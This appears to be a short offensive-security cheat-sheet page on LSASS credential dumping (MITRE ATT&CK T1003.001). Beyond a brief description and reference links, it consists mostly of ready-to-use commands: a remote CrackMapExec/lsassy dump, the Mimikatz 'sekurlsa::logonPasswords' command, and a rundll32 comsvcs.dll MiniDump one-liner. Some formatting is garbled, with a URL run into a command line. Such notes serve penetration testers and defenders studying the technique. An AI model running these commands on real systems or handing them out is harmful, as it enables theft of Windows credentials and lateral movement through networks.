| description |
|---|
MITRE ATT&CK, Credential Access, Sub-technique T1003.001 |
Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory.
# Dumping LSASS remotely with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M lsassy
# Dumping LSASS with Mimikatz
sekurlsa::logonPasswords## https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id{% embed url="https://redcanary.com/threat-detection-report/techniques/lsass-memory/" %}
{% embed url="https://attack.mitre.org/techniques/T1003/001/" %}